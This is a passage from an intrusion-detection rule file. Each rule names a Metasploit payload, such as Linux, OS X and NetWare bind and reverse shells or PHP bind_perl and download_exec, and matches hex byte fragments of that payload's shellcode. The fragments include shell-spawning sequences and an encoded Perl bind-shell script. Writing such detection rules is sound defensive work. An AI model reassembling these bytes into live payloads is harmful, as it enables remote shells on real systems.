(msg:"linux/x86/meterpreter/reverse_tcp"; flow:established; content:"| 31 db 53 43 53 6a 02 6a 66 58 89 e1 cd 80 97 5b 68 |"; content:"| 66 53 89 e1 6a 66 58 50 51 57 89 e1 43 cd 80 5b 99 b6 0c b0 03 cd 80 ff e1 |"; sid:1000064; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell/bind_ipv6_tcp"; flow:established; content:"| 31 db 53 43 53 6a 0a 89 e1 6a 66 58 cd 80 96 99 52 52 52 52 52 52 66 68 00 |"; content:"| 66 68 0a 00 89 e1 6a 1c 51 56 89 e1 43 6a 66 58 cd 80 b0 66 b3 04 cd 80 52 52 56 89 e1 43 b0 66 cd 80 93 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000065; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell/bind_tcp"; flow:established; content:"| 31 db 53 43 53 6a 02 6a 66 58 99 89 e1 cd 80 96 43 52 66 68 00 |"; content:"| 66 53 89 e1 6a 66 58 50 51 56 89 e1 cd 80 b0 66 d1 e3 cd 80 52 52 56 43 89 e1 b0 66 cd 80 93 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000066; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell/find_tag"; flow:established; content:"| 31 db 53 89 e6 6a 40 b7 0a 53 56 53 89 e1 86 fb 66 ff 01 6a 66 58 cd 80 81 3e |"; content:"| 75 f0 5f fc ad ff e6 |"; sid:1000067; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell/reverse_ipv6_tcp"; flow:established; content:"| 31 db 53 43 53 6a 0a 89 e1 6a 66 58 cd 80 96 99 68 00 00 00 00 68 |"; content:"| 68 00 00 5e fe 68 00 00 00 00 68 fe 80 00 00 52 66 68 00 |"; content:"| 66 68 0a 00 89 e1 6a 1c 51 56 89 e1 43 43 6a 66 58 cd 80 89 f3 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000068; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell/reverse_tcp"; flow:established; content:"| 31 db 53 43 53 6a 02 6a 66 58 89 e1 cd 80 97 5b 68 |"; content:"| 66 53 89 e1 6a 66 58 50 51 57 89 e1 43 cd 80 5b 99 b6 0c b0 03 cd 80 ff e1 |"; sid:1000069; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_bind_ipv6_tcp"; flow:established; content:"| 31 db 53 43 53 6a 0a 89 e1 6a 66 58 cd 80 96 99 52 52 52 52 52 52 66 68 00 |"; content:"| 66 68 0a 00 89 e1 6a 1c 51 56 89 e1 43 6a 66 58 cd 80 b0 66 b3 04 cd 80 52 52 56 89 e1 43 b0 66 cd 80 93 59 6a 3f 58 cd 80 49 79 f8 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80 |"; sid:1000070; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_bind_tcp"; flow:established; content:"| 31 db f7 e3 53 43 53 6a 02 89 e1 b0 66 cd 80 5b 5e 52 68 ff 02 00 |"; content:"| 6a 10 51 50 89 e1 6a 66 58 cd 80 89 41 04 b3 04 b0 66 cd 80 43 b0 66 cd 80 93 59 6a 3f 58 cd 80 49 79 f8 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80 |"; sid:1000071; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_find_port"; flow:established; content:"| 31 db 53 89 e7 6a 10 54 57 53 89 e1 b3 07 ff 01 6a 66 58 cd 80 66 81 7f 02 |"; content:"| 75 f1 5b 6a 02 59 b0 3f cd 80 49 79 f9 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 99 b0 0b cd 80 |"; sid:1000072; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_find_tag"; flow:established; content:"| 31 db 53 89 e6 6a 40 b7 0a 53 56 53 89 e1 86 fb 66 ff 01 6a 66 58 cd 80 81 3e |"; content:"| 75 f0 5f 89 fb 6a 02 59 6a 3f 58 cd 80 49 79 f8 6a 0b 58 99 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 53 89 e1 cd 80 |"; sid:1000073; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_reverse_tcp"; flow:established; content:"| 31 db f7 e3 53 43 53 6a 02 89 e1 b0 66 cd 80 5b 5e 68 |"; content:"| 66 53 6a 10 51 50 89 e1 43 6a 66 58 cd 80 59 87 d9 b0 3f cd 80 49 79 f9 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80 |"; sid:1000074; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/shell_reverse_tcp2"; flow:established; content:"| 31 db 53 43 53 6a 02 6a 66 58 89 e1 cd 80 93 59 b0 3f cd 80 49 79 f9 5b 5a 68 |"; content:"| 43 66 53 89 e1 b0 66 50 51 53 89 e1 43 cd 80 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 53 89 e1 b0 0b cd 80 |"; sid:1000075; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"netware/shell/reverse_tcp"; flow:established; content:"| eb 41 57 51 31 ff 8b 54 bd 00 85 d2 74 24 31 f6 8b 5a 08 8a 03 84 c0 74 0d 43 0f b6 0b c1 ce 0d 01 ce fe c8 eb ef 3b 74 24 0c 74 11 8b 12 85 d2 75 dc 47 81 ff 00 02 00 00 75 cb eb 03 8b 42 04 59 5f c3 fa 83 ec 08 89 e1 0f 01 01 fa 8b 59 02 66 8b 6b 4e c1 e5 10 66 8b 6b 48 83 7d 00 00 75 09 81 7d 04 01 c2 8b 80 74 03 4d eb ee 8b 6d f9 e8 00 00 00 00 5f 81 c7 8b 00 00 00 b1 06 ff 37 e8 7d ff ff ff ab fe c9 84 c9 75 f2 fb ff 57 fc 68 ff ff 00 00 ff 57 f8 b9 69 00 00 00 89 fe 29 ce 89 c7 85 c0 0f 84 52 00 00 00 f3 a4 ff e0 31 db 55 89 e5 55 53 6a 01 6a 02 ff 57 f4 89 c6 85 c0 74 3a 53 53 68 |"; content:"| 66 68 02 00 89 e1 55 6a 10 51 56 ff 57 f0 83 f8 ff 74 1c 68 ff ff 00 00 57 89 e1 53 53 53 43 53 4b 51 53 53 89 e1 55 53 51 56 ff 57 ec ff e7 ff 57 e8 cb bd 94 92 1c cc 05 36 80 52 a7 19 88 3d f2 46 7c 68 77 68 ce f0 67 89 90 |"; sid:1000076; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/execute/bind_tcp"; flow:established; content:"| c5 c0 a0 e3 00 00 20 e0 02 15 a0 e3 07 20 a0 e3 01 3a a0 e3 00 40 e0 e3 05 50 25 e0 80 00 00 ef 00 b0 a0 e1 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 00 00 00 00 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 68 c0 a0 e3 80 00 00 ef 0a 00 a0 e1 01 10 a0 e3 6a c0 a0 e3 80 00 00 ef 1e c0 a0 e3 0a 00 a0 e1 10 10 a0 e3 18 10 0d e5 10 20 4d e2 18 30 4d e2 80 00 00 ef 00 70 a0 e1 00 00 50 e3 16 00 00 da 0a 00 a0 e1 06 c0 a0 e3 80 00 00 ef 07 a0 a0 e1 03 c0 a0 e3 0a 00 a0 e1 0b 10 a0 e1 04 20 a0 e3 80 00 00 ef 00 90 9b e4 0b 80 a0 e1 03 c0 a0 e3 0a 00 a0 e1 08 10 a0 e1 09 20 a0 e1 80 00 00 ef 00 00 50 e3 04 00 00 ba 00 80 88 e0 00 90 49 e0 00 00 59 e3 f4 ff ff 1a 00 f0 8b e2 01 c0 a0 e3 80 00 00 ef |"; sid:1000077; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/execute/reverse_tcp"; flow:established; content:"| c5 c0 a0 e3 00 00 20 e0 02 15 a0 e3 07 20 a0 e3 01 3a a0 e3 00 40 e0 e3 05 50 25 e0 80 00 00 ef 00 b0 a0 e1 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 62 c0 a0 e3 80 00 00 ef 00 00 50 e3 12 00 00 1a 03 c0 a0 e3 0a 00 a0 e1 0b 10 a0 e1 04 20 a0 e3 80 00 00 ef 00 90 9b e4 0b 80 a0 e1 03 c0 a0 e3 0a 00 a0 e1 08 10 a0 e1 09 20 a0 e1 80 00 00 ef 00 00 50 e3 04 00 00 ba 00 80 88 e0 00 90 49 e0 00 00 59 e3 f4 ff ff 1a 00 f0 8b e2 01 c0 a0 e3 80 00 00 ef |"; sid:1000078; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/shell/bind_tcp"; flow:established; content:"| c5 c0 a0 e3 00 00 20 e0 02 15 a0 e3 07 20 a0 e3 01 3a a0 e3 00 40 e0 e3 05 50 25 e0 80 00 00 ef 00 b0 a0 e1 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 00 00 00 00 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 68 c0 a0 e3 80 00 00 ef 0a 00 a0 e1 01 10 a0 e3 6a c0 a0 e3 80 00 00 ef 1e c0 a0 e3 0a 00 a0 e1 10 10 a0 e3 18 10 0d e5 10 20 4d e2 18 30 4d e2 80 00 00 ef 00 70 a0 e1 00 00 50 e3 16 00 00 da 0a 00 a0 e1 06 c0 a0 e3 80 00 00 ef 07 a0 a0 e1 03 c0 a0 e3 0a 00 a0 e1 0b 10 a0 e1 04 20 a0 e3 80 00 00 ef 00 90 9b e4 0b 80 a0 e1 03 c0 a0 e3 0a 00 a0 e1 08 10 a0 e1 09 20 a0 e1 80 00 00 ef 00 00 50 e3 04 00 00 ba 00 80 88 e0 00 90 49 e0 00 00 59 e3 f4 ff ff 1a 00 f0 8b e2 01 c0 a0 e3 80 00 00 ef |"; sid:1000079; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/shell/reverse_tcp"; flow:established; content:"| c5 c0 a0 e3 00 00 20 e0 02 15 a0 e3 07 20 a0 e3 01 3a a0 e3 00 40 e0 e3 05 50 25 e0 80 00 00 ef 00 b0 a0 e1 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 62 c0 a0 e3 80 00 00 ef 00 00 50 e3 12 00 00 1a 03 c0 a0 e3 0a 00 a0 e1 0b 10 a0 e1 04 20 a0 e3 80 00 00 ef 00 90 9b e4 0b 80 a0 e1 03 c0 a0 e3 0a 00 a0 e1 08 10 a0 e1 09 20 a0 e1 80 00 00 ef 00 00 50 e3 04 00 00 ba 00 80 88 e0 00 90 49 e0 00 00 59 e3 f4 ff ff 1a 00 f0 8b e2 01 c0 a0 e3 80 00 00 ef |"; sid:1000080; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/shell_bind_tcp"; flow:established; content:"| 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 00 00 00 00 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 68 c0 a0 e3 80 00 00 ef 0a 00 a0 e1 01 10 a0 e3 6a c0 a0 e3 80 00 00 ef 1e c0 a0 e3 0a 00 a0 e1 10 10 a0 e3 18 10 0d e5 10 20 4d e2 18 30 4d e2 80 00 00 ef 00 b0 a0 e1 02 50 a0 e3 5a c0 a0 e3 0b 00 a0 e1 05 10 a0 e1 80 00 00 ef 01 50 45 e2 00 00 55 e3 f8 ff ff aa 00 00 a0 e3 00 10 a0 e3 7e c0 a0 e3 80 00 00 ef 05 50 45 e0 0d 60 a0 e1 20 d0 4d e2 14 00 8f e2 00 00 86 e4 04 50 86 e5 06 10 a0 e1 00 20 a0 e3 3b c0 a0 e3 80 00 00 ef 2f 62 69 6e 2f 73 68 00 |"; sid:1000081; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/shell_reverse_tcp"; flow:established; content:"| 02 00 a0 e3 01 10 a0 e3 06 20 a0 e3 61 c0 a0 e3 80 00 00 ef 00 a0 a0 e1 01 00 00 eb 00 02 00 |"; content:"| 0a 00 a0 e1 0e 10 a0 e1 10 20 a0 e3 62 c0 a0 e3 80 00 00 ef 02 50 a0 e3 5a c0 a0 e3 0a 00 a0 e1 05 10 a0 e1 80 00 00 ef 01 50 45 e2 00 00 55 e3 f8 ff ff aa 00 00 a0 e3 00 10 a0 e3 7e c0 a0 e3 80 00 00 ef 05 50 45 e0 0d 60 a0 e1 20 d0 4d e2 14 00 8f e2 00 00 86 e4 04 50 86 e5 06 10 a0 e1 00 20 a0 e3 3b c0 a0 e3 80 00 00 ef 2f 62 69 6e 2f 73 68 00 |"; sid:1000082; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/armle/vibrate"; flow:established; content:"| 20 08 a0 e1 04 f0 1f e5 74 f9 9e 31 44 44 ea 03 |"; sid:1000083; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/ppc/shell/bind_tcp"; flow:established; content:"| 38 60 00 02 38 80 00 01 38 a0 00 06 38 00 00 61 44 00 00 02 7c 00 02 78 7c 7e 1b 78 48 00 00 0d 00 02 00 |"; content:"| 00 00 00 00 7c 88 02 a6 38 a0 00 10 38 00 00 68 7f c3 f3 78 44 00 00 02 7c 00 02 78 38 00 00 6a 7f c3 f3 78 44 00 00 02 7c 00 02 78 7f c3 f3 78 38 00 00 1e 38 80 00 10 90 81 ff e8 38 a1 ff e8 38 81 ff f0 44 00 00 02 7c 00 02 78 7c 7e 1b 78 38 00 00 03 7f c3 f3 78 38 81 e0 00 38 a0 20 00 7c 88 03 a6 44 00 00 02 7c 00 02 78 4e 80 00 20 7c 00 02 78 |"; sid:1000084; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/ppc/shell/find_tag"; flow:established; content:"| 3b a0 0f ff 3b c0 0f ff 37 9d f0 02 7f dc f0 51 41 80 ff f0 38 1d f0 67 7f c3 f3 78 38 81 ef f8 38 a0 0f ff 38 dd f0 81 44 ff ff 02 7c c6 32 79 a3 61 ef f8 2c 1b |"; content:"| 40 82 ff d4 38 81 ef fc 7c 89 03 a6 4c 81 04 20 7c c6 32 79 |"; sid:1000085; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/ppc/shell/reverse_tcp"; flow:established; content:"| 38 60 00 02 38 80 00 01 38 a0 00 06 38 00 00 61 44 00 00 02 7c 00 02 78 7c 7e 1b 78 48 00 00 0d 00 02 00 |"; content:"| 7c 88 02 a6 38 a0 00 10 38 00 00 62 7f c3 f3 78 44 00 00 02 7c 00 02 78 38 00 00 03 7f c3 f3 78 38 81 e0 00 38 a0 20 00 7c 88 03 a6 44 00 00 02 7c 00 02 78 4e 80 00 20 7c 00 02 78 |"; sid:1000086; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/ppc/shell_bind_tcp"; flow:established; content:"| 38 60 00 02 38 80 00 01 38 a0 00 06 38 00 00 61 44 00 00 02 7c 00 02 78 7c 7e 1b 78 48 00 00 0d 00 02 00 |"; content:"| 00 00 00 00 7c 88 02 a6 38 a0 00 10 38 00 00 68 7f c3 f3 78 44 00 00 02 7c 00 02 78 38 00 00 6a 7f c3 f3 78 44 00 00 02 7c 00 02 78 7f c3 f3 78 38 00 00 1e 38 80 00 10 90 81 ff e8 38 a1 ff e8 38 81 ff f0 44 00 00 02 7c 00 02 78 7c 7e 1b 78 38 a0 00 02 38 00 00 5a 7f c3 f3 78 7c a4 2b 78 44 00 00 02 7c 00 02 78 38 a5 ff ff 2c 05 ff ff 40 82 ff e5 38 00 00 42 44 00 00 02 7c 00 02 78 7c a5 2a 79 40 82 ff fd 7c 68 02 a6 38 63 00 28 90 61 ff f8 90 a1 ff fc 38 81 ff f8 38 00 00 3b 7c 00 04 ac 44 00 00 02 7c 00 02 78 7f e0 00 08 2f 62 69 6e 2f 63 73 68 00 00 00 00 |"; sid:1000087; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/ppc/shell_reverse_tcp"; flow:established; content:"| 38 60 00 02 38 80 00 01 38 a0 00 06 38 00 00 61 44 00 00 02 7c 00 02 78 7c 7e 1b 78 48 00 00 0d 00 02 00 |"; content:"| 7c 88 02 a6 38 a0 00 10 38 00 00 62 7f c3 f3 78 44 00 00 02 7c 00 02 78 38 a0 00 02 38 00 00 5a 7f c3 f3 78 7c a4 2b 78 44 00 00 02 7c 00 02 78 38 a5 ff ff 2c 05 ff ff 40 82 ff e5 38 00 00 42 44 00 00 02 7c 00 02 78 7c a5 2a 79 40 82 ff fd 7c 68 02 a6 38 63 00 20 90 61 ff f8 90 a1 ff fc 38 81 ff f8 38 00 00 3b 7c 00 04 ac 44 00 00 02 2f 62 69 6e 2f 63 73 68 00 41 41 41 |"; sid:1000088; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/bundleinject/bind_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 0f 82 7d 00 00 00 89 c6 52 52 52 68 00 02 00 |"; content:"| 89 e3 6a 10 53 56 52 b0 68 cd 80 72 66 52 56 52 b0 6a cd 80 72 5d 52 52 56 52 b0 1e cd 80 72 53 89 c7 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000089; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/bundleinject/reverse_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 72 6c 89 c7 52 52 68 |"; content:"| 68 00 02 00 |"; content:"| 89 e3 6a 10 53 57 52 b0 62 cd 80 72 51 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000090; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/exec"; flow:established; content:"| 31 c0 50 e8 0c 00 00 00 |"; content:"| 74 68 69 6e 67 |"; content:"| 00 00 00 5e 89 e7 b9 1e 00 00 00 fc f2 a4 89 e3 50 50 53 b0 3b 50 cd 80 |"; sid:1000091; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/isight/bind_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 0f 82 7d 00 00 00 89 c6 52 52 52 68 00 02 00 |"; content:"| 89 e3 6a 10 53 56 52 b0 68 cd 80 72 66 52 56 52 b0 6a cd 80 72 5d 52 52 56 52 b0 1e cd 80 72 53 89 c7 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000092; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/isight/reverse_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 72 6c 89 c7 52 52 68 |"; content:"| 68 00 02 00 |"; content:"| 89 e3 6a 10 53 57 52 b0 62 cd 80 72 51 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000093; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/shell_bind_tcp"; flow:established; content:"| 31 c0 50 68 ff 02 00 |"; content:"| 89 e7 50 6a 01 6a 02 6a 10 b0 61 cd 80 57 50 50 6a 68 58 cd 80 89 47 ec b0 6a cd 80 b0 1e cd 80 50 50 6a 5a 58 cd 80 ff 4f e4 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 54 53 50 b0 3b cd 80 |"; sid:1000094; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/shell_find_port"; flow:established; content:"| 31 c0 50 89 e7 6a 10 54 57 50 50 58 58 40 50 50 6a 1f 58 cd 80 66 81 7f 02 |"; content:"| 75 ee 50 6a 5a 58 cd 80 ff 4f f0 79 f6 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 54 53 50 b0 3b cd 80 |"; sid:1000095; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/shell_reverse_tcp"; flow:established; content:"| 89 e7 31 c0 50 6a 01 6a 02 6a 10 b0 61 cd 80 57 50 50 6a 62 58 cd 80 50 6a 5a 58 cd 80 ff 4f e8 79 f6 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 54 53 50 b0 3b cd 80 |"; sid:1000096; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/vforkshell/bind_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 0f 82 7d 00 00 00 89 c6 52 52 52 68 00 02 00 |"; content:"| 89 e3 6a 10 53 56 52 b0 68 cd 80 72 66 52 56 52 b0 6a cd 80 72 5d 52 52 56 52 b0 1e cd 80 72 53 89 c7 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000097; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/vforkshell/reverse_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 72 6c 89 c7 52 52 68 |"; content:"| 68 00 02 00 |"; content:"| 89 e3 6a 10 53 57 52 b0 62 cd 80 72 51 89 e5 83 ec 08 31 c9 f7 e1 51 89 e6 b0 04 50 56 57 50 48 cd 80 72 3a 8b 74 24 10 31 c0 50 50 48 50 40 66 b8 02 10 50 31 c0 b0 07 50 56 52 52 b0 c5 cd 80 72 1c 89 c3 01 f3 56 89 d8 29 f0 50 57 52 31 c0 b0 03 cd 80 72 08 29 c3 29 c6 75 ea ff e3 |"; sid:1000098; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/vforkshell_bind_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 0f 82 7e 00 00 00 89 c6 52 52 52 68 00 02 00 |"; content:"| 89 e3 6a 10 53 56 52 b0 68 cd 80 72 67 52 56 52 b0 6a cd 80 72 5e 52 52 56 52 b0 1e cd 80 72 54 89 c7 31 db 83 eb 01 43 53 57 53 b0 5a cd 80 72 43 83 fb 03 75 f1 31 c0 50 50 50 50 b0 3b cd 80 90 90 3c 2d 75 09 b0 42 cd 80 83 fa 00 74 17 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 50 53 50 b0 3b cd 80 31 c0 50 89 e3 50 50 53 50 50 b0 07 cd 80 31 c0 50 50 40 cd 80 |"; sid:1000099; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"osx/x86/vforkshell_reverse_tcp"; flow:established; content:"| 31 c0 99 50 40 50 40 50 52 b0 61 cd 80 72 6d 89 c7 52 52 68 |"; content:"| 68 00 02 00 |"; content:"| 89 e3 6a 10 53 57 52 b0 62 cd 80 72 52 31 db 83 eb 01 43 53 57 53 b0 5a cd 80 72 43 83 fb 03 75 f1 31 c0 50 50 50 50 b0 3b cd 80 90 90 3c 2d 75 09 b0 42 cd 80 83 fa 00 74 17 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 50 53 50 b0 3b cd 80 31 c0 50 89 e3 50 50 53 50 50 b0 07 cd 80 31 c0 50 50 40 cd 80 |"; sid:1000100; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/bind_perl"; flow:established; content:"| 73 79 73 74 65 6d 28 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 27 63 47 56 79 62 43 41 74 54 55 6c 50 49 43 31 6c 49 43 63 6b 63 44 31 6d 62 33 4a 72 4b 43 6b 37 5a 58 68 70 64 43 78 70 5a 69 52 77 4f 79 52 6a 50 57 35 6c 64 79 42 4a 54 7a 6f 36 55 32 39 6a 61 32 56 30 4f 6a 70 4a 54 6b 56 55 4b 45 78 76 59 32 46 73 55 47 39 79 64 43 77 |"; content:"| 4c 46 4a 6c 64 58 4e 6c 4c 44 45 73 54 47 6c 7a 64 47 56 75 4b 53 30 2b 59 57 4e 6a 5a 58 42 30 4f 79 52 2b 4c 54 35 6d 5a 47 39 77 5a 57 34 6f 4a 47 4d 73 64 79 6b 37 55 31 52 45 53 55 34 74 50 6d 5a 6b 62 33 42 6c 62 69 67 6b 59 79 78 79 4b 54 74 7a 65 58 4e 30 5a 57 30 6b 58 79 42 33 61 47 6c 73 5a 54 77 2b 4a 77 3d 3d 27 29 29 3b |"; sid:1000101; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/download_exec"; flow:established; content:"| 09 09 69 66 20 28 21 66 75 6e 63 74 69 6f 6e 5f 65 78 69 73 74 73 28 27 73 79 73 5f 67 65 74 5f 74 65 6d 70 5f 64 69 72 27 29 29 20 7b 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 73 79 73 5f 67 65 74 5f 74 65 6d 70 5f 64 69 72 28 29 20 7b 0a 09 09 09 09 69 66 20 28 21 65 6d 70 74 79 28 24 5f 45 4e 56 5b 27 54 4d 50 27 5d 29 29 20 7b 20 72 65 74 75 72 6e 20 72 65 61 6c 70 61 74 68 28 24 5f 45 4e 56 5b 27 54 4d 50 27 5d 29 3b 20 7d 0a 09 09 09 09 69 66 20 28 21 65 6d 70 74 79 28 24 5f 45 4e 56 5b 27 54 4d 50 44 49 52 27 5d 29 29 20 7b 20 72 65 74 75 72 6e 20 72 65 61 6c 70 61 74 68 28 24 5f 45 4e 56 5b 27 54 4d 50 44 49 52 27 5d 29 3b 20 7d 0a 09 09 09 09 69 66 20 28 21 65 6d 70 74 79 28 24 5f 45 4e 56 5b 27 54 45 4d 50 27 5d 29 29 20 7b 20 72 65 74 75 72 6e 20 72 65 61 6c 70 61 74 68 28 24 5f 45 4e 56 5b 27 54 45 4d 50 27 5d 29 3b 20 7d 0a 09 09 09 09 24 74 65 6d 70 66 69 6c 65 3d 74 65 6d 70 6e 61 6d 28 75 6e 69 71 69 64 28 72 61 6e 64 28 29 2c 54 52 55 45 29 2c 27 27 29 3b 0a 09 09 09 09 |"; content:"| 69 66 20 28 66 69 6c 65 5f 65 78 69 73 74 73 28 24 74 65 6d 70 66 69 6c 65 29 29 20 7b 0a 09 09 09 09 09 40 75 6e 6c 69 6e 6b 28 24 74 65 6d 70 66 69 6c 65 29 3b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 72 65 61 6c 70 61 74 68 28 64 69 72 6e 61 6d 65 28 24 74 65 6d 70 66 69 6c 65 29 29 3b 0a 09 09 09 09 7d 0a 09 09 09 09 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 24 66 6e 61 6d 65 20 3d 20 73 79 73 5f 67 65 74 5f 74 65 6d 70 5f 64 69 72 28 29 20 2e 20 44 49 52 45 43 54 4f 52 59 5f 53 45 50 41 52 41 54 4f 52 20 2e 20 22 |"; content:"| 2e 65 78 65 22 3b 0a 09 09 24 66 64 5f 69 6e 20 3d 20 66 6f 70 65 6e 28 22 2f 66 69 6c 65 |"; content:"| 22 2c 20 22 72 62 22 29 3b 0a 09 09 24 66 64 5f 6f 75 74 20 3d 20 66 6f 70 65 6e 28 24 66 6e 61 6d 